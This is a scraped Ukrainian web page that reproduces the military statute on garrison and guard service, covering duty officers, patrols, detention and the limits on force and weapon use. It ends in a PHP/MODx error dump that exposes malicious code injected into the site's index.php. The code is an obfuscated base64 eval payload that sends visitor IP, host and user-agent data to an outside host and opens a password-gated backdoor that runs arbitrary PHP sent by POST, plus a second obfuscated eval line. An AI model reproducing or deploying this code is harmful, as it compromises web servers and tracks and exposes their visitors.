Статут гарнізонної та вартової служб.

Український легіон » Дисципліни » Статут ЗСУ » Статут гарнізонної та вартової служб.

1. Чергування в гарнізоні.

     Гарнізонний наряд призначається для охорони та гарнізону, а також для контролю за додержанням Пра­вил дорожнього руху водіями (механіками-водіями) транспортних засобів військових частин та для виконан­ня інших завдань гарнізонної служби.

У складі гарнізонного наряду передбачаються:

    черговий варт;

    помічник чергового варт;

    черговий підрозділ;

    гарнізонні варти;

    гарнізонні патрулі;

    інспектори і патрульні контрольних постів військової інспекції безпеки дорожнього руху.

     Гарнізонний наряд призначається не пізніше ніж за добу до заступання в наряд. Він забезпечується транспортними засобами тих військових частин, від яких даний наряд призначено.

     Командири військових частин (підрозділів), від яких призначається гарнізонний наряд, несуть відпові­дальність за добір і розподіл особового складу, його підготовку до несення служби, своєчасне направлення на інструктаж і прибуття на розвід, за постійну готов­ність чергового підрозділу і своєчасне його прибуття за викликом до місця призначення.

     Військовий комендант разом з начальником військової інспекції безпеки дорожнього руху гарнізону на кожний місяць складає відомість гарнізонного наря­ду, яка затверджується начальником гарнізону і є під­ставою для складення відомості добового наряду.

      Витяги з відомості гарнізонного наряду розсилають­ся до всіх військових частин, залучених до несення служби, за 10 діб до початку нового місяця. Про кожні зміни у відомості гарнізонного наряду військовий комендант гарнізону своєчасно повідомляє військовим частинам.

      Напередодні заступання в наряд у штабі військової частини черговому варт і начальникам гарнізон­них патрулів вручаються приписи, на підставі яких військовий комендант гарнізону видає черговому варт записки із старими та новими паролями, а начальникам патрулів - посвідчення начальника патруля, у яких зазначаються маршрут руху, час патрулювання, особливі обов'язки та аркуші паперу для запису затриманих.

      Черговий варт і його помічник, склад патруля, інспектори та патрульні військової інспекції безпеки до­рожнього руху повинні бути в установленій формі одягу, на лівому боці грудей (лівому рукаві) має бути нагруд­ний знак (пов'язка з тканини синього кольору) з відпо­відним написом. Інспектори і патрульні військової інспекції безпеки дорожнього руху під час несення служби підпорядковуються начальникові військової ін­спекції безпеки дорожнього руху гарнізону, несуть службу відповідно до його вказівок, крім того, повинні мати документи інспектора військової інспекції безпеки дорожнього руху і жезл регулювальника.

2.  Черговий варт і його помічник. Черговий підрозділ гарнізону.

     Для безпосереднього керівництва гарнізонними вартами призначається черговий варт з офіцерів війсь­кових частин гарнізону, за посадою не нижче командира роти, та його помічник - з молодших офіцерів.

     Наказом начальника гарнізону обов'язки чергового варт можуть бути покладені на чергового військової частини, від якої призначена гарнізонна варта.

     Черговий варт підпорядковується начальникові гарнізону та військовому комендантові гарнізону. Він відповідає за правильне несення служби гарнізонними вартами.

      Черговий варт зобов'язаний:

      одержати напередодні заступання на чергування в штабі військової частини припис        про призначення його на чергування;

      прибути в призначений час до військового комендан­та гарнізону, подати припис про призначення черговим варт, отримати записки з паролями та необхідні вка­зівки;

      відрекомендуватися попередньому черговому варт І повідомити йому пароль для зміни;

      вивчити відомість гарнізонного наряду, схеми розмі­щення постів, табелі постів, інструкції начальникам варт, черговому варт та патрулів, схему патрулювання;

      провести розвід гарнізонних варт;

      перебувати у відведеному для нього приміщенні, від­лучаючись з нього за службовою необхідністю, зали­шати за себе свого помічника, повідомивши його, куди і на який час відлучився;

      перевіряти не менше як двічі на добу (з них один раз уночі) несення служби вартами і вживати заходів щодо термінового усунення виявлених недоліків;

      давати вказівки щодо змін тривалості перебування чатових на постах залежно від погодних умов;

      перевіряти готовність чергового підрозділу гарнізону до дій у разі тривоги або виклику.

      Після закінчення розводу новий черговий варт  приймає від попереднього чергового зазначені в описі документи.

      Після доповіді начальників варт про проведену зміну чергові варт про здавання та приймання чергування до­повідають начальникові гарнізону, а за його відсутно­сті - військовому .комендантові гарнізону, наприклад: «Товаришу (пане) генерал-майоре. Капітан Марков чер­гування по вартах здав»; «Товаришу (пане) генерал-майоре. Капітан Дзюба чергування по вартах прийняв».

     Недоліки, виявлені під час приймання чергування, записують до книги приймання та здавання чергування, яку новий черговий варт подає на перегляд військовому комендантові гарнізону.

     Під час прибуття начальника гарнізону, військо­вого коменданта гарнізону та їх начальників черговий варт зустрічає їх і доповідає, наприклад: «Товаришу (пане) полковнику. За час чергування надзвичайних подій не трапилося (або трапилося - перелічити, що саме). Черговий варт капітан Коваль».

     Під час прибуття посадової особи для перевірки варт черговий варт перевіряє у неї разове посвідчення на право перевірки варти (посвідчення про відрядження для офіцерів із штабів вищого рівня), посвідчення осо­би, після чого супроводжує у вартове приміщення осо­бисто або посилає свого помічника.

     У разі надзвичайної події в одній з гарнізонних варт черговий варт негайно відбуває на місце події. У разі потреби, з дозволу начальника або військового коменданта гарнізону, викликає черговий підрозділ або його частину, а під час виникнення пожежі — пожежну команду.

     Про надзвичайну подію у вартах і про вжиті заходи черговий варт негайно доповідає начальникові гарнізо­ну й військовому комендантові гарнізону та повідомляє командирові військової частини, від якої відряджено варту.

     У разі заміни (хвороби, поранення тощо) на­чальника варти черговий варт покладає виконання його обов'язків на помічника начальника варти, викликає

     3 військової частини нового начальника варти, прибуває разом із ним до вартового приміщення та керує прий­манням варти. Про заміну начальника варти доповідає військовому комендантові гарнізону.

     Помічник чергового варт підпорядковується чер­говому варт.

     Помічник чергового варт зобов'язаний:        ;

     прибути разом із черговим варт у призначений час до військового коменданта гарнізону на інструктаж;

     вивчити відомості гарнізонного наряду, схему розмі­щення постів, табелі постів, інструкції начальникам варт, черговому варт та його .помічникові, патрулям, схему патрулювання;

     вишикувати варти для розводу, перевірити їх склад, записати військові звання та прізвища начальників варт й оголосити особовому складові військове звання та прізвище чергового варт і своє прізвище;

     прийняти за описом майно та інвентар, що перебуває в кімнаті чергового варт;

     перевіряти за наказом чергового варт несення служ­би вартами та доповідати йому про результати пере­вірки;

     виконувати обов'язки чергового варт за його відсут­ності.

     Черговий варт та його помічник перебувають у військовій комендатурі гарнізону, їх забезпечують транспортом тієї військової частини, від якої вони від-наряджені.

      Черговий варт та його помічник озброюються пістолетами з двома спорядженими магазинами, їм дозволено по черзі відпочивати (спати) не більш як 4 години кожному у визначений начальником гарнізо­ну час, не роздягаючись (без взуття) й не скидаючи спорядження.

      Черговий підрозділ гарнізону призначається на­казом начальника гарнізону для посилення гарнізонних варт або термінового виклику на випадок пожежі, сти­хійного лиха й інших надзвичайних подій у гарнізоні.

      У наказі визначається склад чергового підрозділу, вид озброєння, кількість боєприпасів, форма одягу, транспортні засоби, порядок виклику та час відпочинку.

      У великих гарнізонах може бути призначено кілька чергових підрозділів гарнізону.

      Черговий підрозділ має бути призначений на кож­ну добу, як правило, від тієї військової частини, від якої віднаряджено гарнізонні варти. Черговий підрозділ під­порядковується начальникові гарнізону, військовому комендантові гарнізону, черговому варт. Виклик чергового підрозділу здійснюється начальником гарнізону, війсь­ковим комендантом гарнізону та черговим варт з по­дальшою доповіддю військовому комендантові гарнізону.

      У разі виклику перед командиром чергового під­розділу ставиться завдання, у якому визначаються міс­це, час і мета дій. Боєприпаси черговому підрозділові видають за розпорядженням командира (начальника штабу) військової частини або чергового частини. Одно­часно з викликом чергового підрозділу розпорядженням начальника гарнізону або військового коменданта гарні­зону у разі потреби призначається новий черговий під­розділ.

      Командир військової частини особисто проводить інструктаж чергового підрозділу гарнізону, відповідає за його постійну готовність, а також за своєчасне при­буття до місця призначення.

      Черговий підрозділ проводить заняття поблизу розташування своєї військової частини. Місце перебу­вання чергового підрозділу має бути точно відоме черго­вому військової частини та черговому варт.

      Після прибуття до місця призначення черговий підрозділ діє за вказівкою військового коменданта гар­нізону, чергового варт або особи, у розпорядження якої цей підрозділ передано.

 

3. Патрулювання в гарнізоні.

      У кожному гарнізоні для підтримання порядку серед військовослужбовців на вулицях і в громадських місцях, на залізничних станціях (вокзалах), у морських (річкових) портах, аеропортах, а також у прилеглих до гарнізону населених пунктах наказом начальника гарні­зону організовується патрулювання.

      Патрулі відряджаються із складу військових частин гарнізону.

      Патруль складається із начальника патруля і двох-трьох патрульних.

      Начальником патруля залежно від завдань, покла­дених на патруль, призначається офіцер, прапорщик (мічман) або сержант (старшина).

     Патрульних призначають із осіб рядового ,сержант­ського складу.

     Патрулі можуть бути піші чи на автотранспорті. Патрулювання проводять протягом доби або лише на певний час дня чи ночі.

     Патруль, призначений на добу, несе службу протягом 4 годин із двогодинним відпочинком у військовій комен­датурі або в місці, визначеному військовим комендан­том.

     Озброєння особового складу патрулів та форма одягу встановлюються наказом начальника гарнізону. Начальники патрулів - офіцери, прапорщики (мічма­ни), як правило, озброюються пістолетами з двома ма­газинами, спорядженими патронами, а решта особового складу залежно від умов може бути без зброї або зі зброєю (автомати, багнети, гумові кийки).

     Начальник патруля у разі потреби має переносну радіостанцію для зв'язку з іншими нарядами патрулів, міліцією та військовою комендатурою.

     Гарнізонні патрулі підпорядковуються військово­му комендантові та черговому помічникові військового коменданта гарнізону (черговому варт, де черговий по­мічник військового коменданта гарнізону не передбаче­ний штатом).

     Патрулі, яких віднаряджено для патрулювання на залізничних станціях (вокзалах), у морських (річко­вих) портах та аеропортах, крім того, підпорядковують­ся військовим комендантам цих станцій (вокзалів), пор­тів. Для їх відпочинку виділяються спеціально облад­нані кімнати патрулів.

     Схема патрулювання та інструкція патрулям складається військовим комендантом. гарнізону і за­тверджується начальником гарнізону.

     На схемі патрулювання визначаються: маршрути руху патрулів (2—3 варіанти), .розташування громадських місць (парків, театрів, клубів тощо), телефонів для зв'язку з військовою комендатурою та розташуван­ня органів внутрішніх справ.

В інструкції патрулям визначаються завдання патру­лів, випадки та умови застосування зброї, особливості несення ними служби на кожному маршруті руху та способи зв'язку з військовою комендатурою гарнізону й органами внутрішніх справ, найближчими постами міліції, а також порядок доповіді.

     Начальник патруля відповідає за правильне не­сення служби патрульними, підтримання порядку та додержання військової дисципліни військовослужбовця­ми на маршруті патрулювання.

     Начальник патруля зобов'язаний:

     прибути в призначений час до військового коменданта гарнізону на інструктаж;                 . 

     вивчити необхідні документи,, що стосуються несення служби;

     керувати несенням служби патрульними;

     стежити за поведінкою військовослужбовців, у разі потреби перевіряти їх документи,    затримувати військо­вослужбовців, які порушують форму одягу, військову дисципліну, громадський порядок;

     знати на своєму маршруті розташування телефонів для зв'язку з військовою комендатурою гарнізону та органами внутрішніх справ;

     взаємодіяти з міліцією для підтримання, порядку на вулицях і в громадських місцях;

     доповідати у військову комендатуру про результати патрулювання.

              Патрульний зобов'язаний:

     пильно нести службу, стежити за поведінкою війсь­ковослужбовців і доповідати про помічені порушення ними військової дисципліни та громадського порядку начальникові патруля;

     точно і швидко виконувати накази начальника патру­ля і нікуди не відлучатися без його дозволу;

     рішуче й уміло діяти під час затримання порушників військової дисципліни та громадського порядку;

     нічого не брати від затриманих і не передавати їм без дозволу начальника патруля, доповідати начальни­кові патруля про прохання затриманих;

     після закінчення патрулювання і прибуття до війсь­кової частини з дозволу начальника патруля повернутися до свого підрозділу і доповісти черговому підрозді­лу про своє прибуття.

     Особовий склад патруля під час виконання своїх обов'язків повинен бути взірцем додержання військової дисципліни, форми одягу та військової ввічливості.

     У разі виявлення непокори або вчинення опору військовослужбовцем під час його затримання началь­ник патруля має право застосувати до нього силу, по­передивши про намір її застосування. Коли уникнути застосування сили неможливо, вона не може перевищу­вати необхідної для затримання міри.

      У разі затримання військовослужбовця в нетверезо­му стані начальник патруля не повинен вимагати від нього жодних пояснень.

      За порушення військової дисципліни, громадсько­го порядку військовослужбовцем, старшим за військо­вим званням, начальник патруля звертається до нього з проханням припинити порушення дисципліни, громад­ського порядку. Коли цього не виконують, начальник патруля затримує його, про що негайно доповідає війсь­ковому комендантові гарнізону чи його помічникові та діє за їх вказівкою. Якщо військовослужбовцями стро­кової служби (за контрактом) під час перебування їх у звільненні допущено грубе порушення правил носіння військової форми одягу, невиконання військового вітан­ня або інші прояви недисциплінованості, начальник пат­руля має право припинити таким військовослужбовцям звільнення і відправити їх у супроводженні патрульного до військової комендатури або повернути до їх військо­вої частини для вжиття заходів.       Затримуються і відправ­ляються до військової комендатури і військовослужбов­ці, які прибули по записках про звільнення з іншого гарнізону. Про час і причину затримання начальник патруля робить позначку на записці про звільнення військовослужбовця.

     У затриманих військовослужбовців вилучають холодну, вогнепальну зброю та боєприпаси, а також документи, що посвідчують особу; їх начальник патруля Здає військовому комендантові гарнізону або його по­мічникові (черговому варт).

     Затриманих військовослужбовців приймає чер­говий помічник військового коменданта (черговий варт), про що складає протокол про затримання та записує до книги обліку затриманих (додаток 1 до цього Статуту), проводить медичний огляд і розміщує у камері тимчасо­во затриманих до прийняття рішення військовим комен­дантом гарнізону.

      Застосування зброї - крайній захід, його допу­скають у виняткових випадках і в порядку, визначеному в цьому Статуті.

      Начальник патруля має право особисто застосо­вувати зброю чи віддати патрульним наказ застосовува­ти зброю лише за таких обставин:

для захисту військовослужбовців, а в разі потреби й цивільних осіб від нападу, що загрожує їх життю, якщо іншими способами захистити їх неможливо;

для відбиття нападу на патруль, коли життю началь­ника патруля або патрульних загрожує безпосередня небезпека;

під час затримання злочинця, який чинить збройний опір, або злочинця, що намагається втекти з-під варти, коли іншого способу затримати їх немає.

      Перед застосуванням зброї, якщо дозволяють обставини, начальник патруля повинен голосом або по­стрілом угору попередити про це особу, проти якої має бути застосована зброя. Про застосування зброї началь­ник патруля негайно доповідає військовому коменданто­ві гарнізону (черговому варт).

      Складові патруля в усіх випадках категорично заборонено застосовувати зброю на багатолюдних вули­цях, майданах і в громадських місцях, коли від цього можуть потерпіти сторонні особи.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0103 s(22 Requests)
  PHP: 0,2456 s 
  Total: 0,2559 s